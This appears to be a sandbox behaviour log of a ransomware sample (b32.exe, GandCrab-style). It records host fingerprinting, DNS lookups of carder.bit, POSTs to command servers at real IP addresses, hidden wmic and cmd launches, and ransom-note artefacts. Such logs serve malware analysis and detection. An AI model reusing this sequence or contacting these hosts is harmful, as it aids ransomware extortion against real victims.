Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 2
Fn
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = MyMainWnd, index = 18446744073709551600, new_long = 1421869056 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Thread 0xafc
2 0
»
Category Operation Information Success Count Logfile
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 1
Fn
Thread 0xb1c
90 35
»
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=e65fbbbf9c354b42 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
System Get Time type = Ticks, time = 109341 True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, type = size True 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 323593, size_out = 323593 True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xb44, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 308 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 193.107.99.167, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = eeploreza, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 193.107.99.167/eeploreza True 1
Fn
Data
Inet Read Response size = 204798, size_out = 552 True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 125939 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = Ticks, time = 156765 True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0x770, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read filename = C:\\CRAB-DECRYPT.txt, size = 4096, size_out = 308 True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 46.40.123.136, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = phow, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 46.40.123.136/phow True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x760edf04 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Process Create process_name = C:\Windows\system32\wbem\wmic.exe, show_window = SW_HIDE True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x760edf04 True 1
Fn
System Get Time type = Ticks, time = 162038 True 1
Fn
System Get Time type = Ticks, time = 162927 True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\\pidor.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\\pidor.bmp, size = 14 True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\\pidor.bmp, size = 40 True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\\pidor.bmp, size = 5184000 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process Create process_name = https://www.torproject.org/download/download-easy.html.en, show_window = SW_SHOW False 1
Fn
Thread 0xb20
524 0
»
Category Operation Information Success Count Logfile
Driver Enumerate load_addresses = 1638160 True 1
Fn
Driver Enumerate load_addresses = 4128768 True 1
Fn
Driver Get Name load_address = 42020864 True 1
Fn
Driver Get Name load_address = 48222208 True 1
Fn
Driver Get Name load_address = 12279808 True 1
Fn
Driver Get Name load_address = 13033472 True 1
Fn
Driver Get Name load_address = 13357056 True 1
Fn
Driver Get Name load_address = 13438976 True 1
Fn
Driver Get Name load_address = 13824000 True 1
Fn
Driver Get Name load_address = 15667200 True 1
Fn
Driver Get Name load_address = 16338944 True 1
Fn
Driver Get Name load_address = 16400384 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14716928 True 1
Fn
Driver Get Name load_address = 14757888 True 1
Fn
Driver Get Name load_address = 14966784 True 1
Fn
Driver Get Name load_address = 15020032 True 1
Fn
Driver Get Name load_address = 15106048 True 1
Fn
Driver Get Name load_address = 15192064 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 15568896 True 1
Fn
Driver Get Name load_address = 12689408 True 1
Fn
Driver Get Name load_address = 15605760 True 1
Fn
Driver Get Name load_address = 12861440 True 1
Fn
Driver Get Name load_address = 12926976 True 1
Fn
Driver Get Name load_address = 17334272 True 1
Fn
Driver Get Name load_address = 17645568 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17727488 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18112512 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21909504 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21364736 True 1
Fn
Driver Get Name load_address = 23117824 True 1
Fn
Driver Get Name load_address = 25231360 True 1
Fn
Driver Get Name load_address = 25534464 True 1
Fn
Driver Get Name load_address = 25600000 True 1
Fn
Driver Get Name load_address = 25911296 True 1
Fn
Driver Get Name load_address = 25944064 True 1
Fn
Driver Get Name load_address = 26181632 True 1
Fn
Driver Get Name load_address = 26255360 True 1
Fn
Driver Get Name load_address = 26292224 True 1
Fn
Driver Get Name load_address = 26529792 True 1
Fn
Driver Get Name load_address = 26619904 True 1
Fn
Driver Get Name load_address = 27217920 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 27045888 True 1
Fn
Driver Get Name load_address = 21540864 True 1
Fn
Driver Get Name load_address = 27103232 True 1
Fn
Driver Get Name load_address = 27168768 True 1
Fn
Driver Get Name load_address = 21692416 True 1
Fn
Driver Get Name load_address = 21729280 True 1
Fn
Driver Get Name load_address = 21766144 True 1
Fn
Driver Get Name load_address = 21811200 True 1
Fn
Driver Get Name load_address = 22904832 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 56885248 True 1
Fn
Driver Get Name load_address = 57446400 True 1
Fn
Driver Get Name load_address = 57729024 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57921536 True 1
Fn
Driver Get Name load_address = 57982976 True 1
Fn
Driver Get Name load_address = 58093568 True 1
Fn
Driver Get Name load_address = 58175488 True 1
Fn
Driver Get Name load_address = 58507264 True 1
Fn
Driver Get Name load_address = 58556416 True 1
Fn
Driver Get Name load_address = 58601472 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 18579456 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 60964864 True 1
Fn
Driver Get Name load_address = 61112320 True 1
Fn
Driver Get Name load_address = 61181952 True 1
Fn
Driver Get Name load_address = 61681664 True 1
Fn
Driver Get Name load_address = 61771776 True 1
Fn
Driver Get Name load_address = 61837312 True 1
Fn
Driver Get Name load_address = 61927424 True 1
Fn
Driver Get Name load_address = 62074880 True 1
Fn
Driver Get Name load_address = 62124032 True 1
Fn
Driver Get Name load_address = 62316544 True 1
Fn
Driver Get Name load_address = 62427136 True 1
Fn
Driver Get Name load_address = 62562304 True 1
Fn
Driver Get Name load_address = 62668800 True 1
Fn
Driver Get Name load_address = 62713856 True 1
Fn
Driver Get Name load_address = 62775296 True 1
Fn
